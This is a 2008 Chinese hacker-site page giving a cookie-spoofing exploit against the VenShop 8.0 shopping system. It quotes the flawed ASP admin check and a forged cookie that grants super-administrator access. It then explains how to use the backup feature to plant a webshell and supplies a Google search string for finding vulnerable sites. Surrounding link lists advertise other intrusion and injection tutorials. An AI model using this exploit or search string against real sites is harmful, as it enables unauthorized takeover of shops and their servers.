·	完美空间提供500M免费AS	04-10	·	企业安全之YY内网准入以	04-09
·	企业安全之意识与策略	04-09	·	剑走偏锋:IIS漏洞利用	04-09
·	我来免费网提供100M免费	04-09	·	1122mb.com提供20G超大免	04-08
·	映像劫持与反劫持技术	04-07	·	让所有"暴力删除工具"无	04-07
·	入侵88red系统的详细过程	04-07	·	Sql Injection脚本注入终	04-07
·	vbs+delphi 反弹后门生成	04-07	·	飞讯网提供100MB免费PHP	04-07
·	突破SQL注入攻击时输入框	04-04	·	结合内核和病毒技术的最	04-04
·	Real Player rmoc3260.d	04-04	·	亿万网络今月最后为您提	04-04
·	php+mysql 5 sql inject	04-03	·	Real Player rmoc3260.d	04-03
·	oblog文件下载漏洞	04-03	·	免费啦提供1G-2G免费全能	04-03
·	完全解析网页后门和挂马	04-02	·	一句话开3389（只测试过	04-02
·	萧萧免费空间网提供100M	04-02	·	谷道免费空间网提供1G免	04-01
·	从本地入手解决双线路由	03-31	·	sablog 1.6 多个跨站漏洞	03-31
·	富文本编辑器的跨站脚本	03-31	·	Cookie注入是怎样产生的	03-31

[推荐]凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞

热荐 ★★★★

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-3-18 10:56:34

代码http://www.venshop.com/down/venshop.rar
小程序，备忘一下
ad_chk.asp判断管理员登陆状态

以下是引用片段：
<%
if Request.Cookies("venshop")("admin_name")="" or Request.Cookies("venshop")("admin_pass")="" or Request.Cookies("venshop")("admin_class")="" then
Response.Cookies("venshop")("admin_name")=""
Response.Cookies("venshop")("admin_pass")=""
Response.Cookies("venshop")("admin_class")=""
response.redirect "ad_login.asp"
response.end
end if
%>

判断admin_class

以下是引用片段：
C:\Inetpub\wwwroot>findstr /i /n /s "admin_class" *.asp
ad_admin.asp:29: rs("admin_class")=request("class1")
ad_admin.asp:43:rs("admin_class")=request("class")
ad_admin.asp:92:<option value="0"<%if rs("admin_class")=0 then response.write" s
elected"%>>总管理员</option>
ad_admin.asp:93:<option value="1"<%if rs("admin_class")=1 then response.write" s
elected"%>>产品管理</option>
ad_admin.asp:94:<option value="2"<%if rs("admin_class")=2 then response.write" s
elected"%>>订单管理</option></select></td>
........................

可以看出当admin_class=0的时候就是总管理员身份了。
伪造cookie如下

Themes=default; Count=lao=3; Countecho=lao=True; ASPSESSIONIDQAADRSRB=CDBDHEHCLJOIHFDAHLFHABIO; venshop=admin%5Fclass=0&admin%5Fpass=admin&admin%5Fname=admin

然后访问http://www.target.com/ad_manage.asp即可，后台有数据库备份可以拿webshell。

inurl:"views.asp?hw_id="#google

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章： linux平台下渗透日本著名XXXXXX.TV

下一篇文章：对趋势科技等数万网站被攻击的分析

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

入侵88red系统的详细过程	04-07
对趋势科技等数万网站被攻击的分	03-21
凡人网络购物系统 V8.0 简体中文	03-18
linux平台下渗透日本著名XXXXXX.	03-18
搜索框所引起的XSS漏洞	03-05
跳转漏洞的利用	03-05
对复旦大学的一次漫长渗透	03-03
.net一句话马以及dx论坛拿shell	03-01
php渗透入侵过程图文详解	03-01
DJ网站的入侵详细过程	02-26
BBSXP2008存在后台注射漏洞	02-19
Discuz! 6 后台拿Shell的方法	02-17

Cookie注入是怎样产生的
MSSQL cookie注入工具[web版]
MSSQL错误提示开启下的 COOKIE注入辅助
破解Session cookie的方法
完美的解决跨站脚本得COOKIE弹框框的问
XSS攻击Cookie欺骗中隐藏JavaScript执行
XSS攻击Cookie欺骗中隐藏JavaScript执行
Cookie的传递流程及安全问题
网站入侵：cookie技术与欺骗
教你怎样从cookie里获取信息
破解Session cookie的方法
另类的注射攻击----cookie注射(图)